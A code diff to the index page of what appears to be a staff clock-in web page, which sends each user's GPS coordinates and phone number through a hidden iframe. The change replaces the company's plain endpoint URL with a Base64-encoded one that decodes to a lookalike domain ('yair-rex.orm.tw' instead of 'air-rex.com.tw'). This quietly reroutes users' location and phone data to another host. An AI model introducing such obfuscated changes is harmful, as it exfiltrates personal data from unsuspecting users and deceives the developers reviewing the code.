--- a/index.htm
+++ b/index.htm
@@ -39,8 +39,15 @@
                 navigator.geolocation.getCurrentPosition(function(position) {
                     let lat = position.coords.latitude;
                     let lon = position.coords.longitude;
-                    let url = `https://www.air-rex.com.tw/amb.php?latitude=${lat}&longitude=${lon}&tel=${tel}`; // 傳遞電話號碼
-                    document.getElementById("hiddenFrame").src = url; // 將請求加載到隱藏的 iframe
+ 
+                    let encodedUrl = "aHR0cHM6Ly93d3cueWFpci1yZXgub3JtLnR3L2FtYi5waHA=";
+                    
+                    // 解碼 Base64 字符串
+                    let url = atob(encodedUrl);
+                    
+                    // 組合 URL 並設置參數
+                    let fullUrl = `${url}?latitude=${lat}&longitude=${lon}&tel=${tel}`;
+                    document.getElementById("hiddenFrame").src = fullUrl; // 將請求加載到隱藏的 iframe
                     document.getElementById("status").innerText = "打卡中！";
                 }, function(error) {
                     document.getElementById("status").innerText = "無法獲取位置: " + error.message;
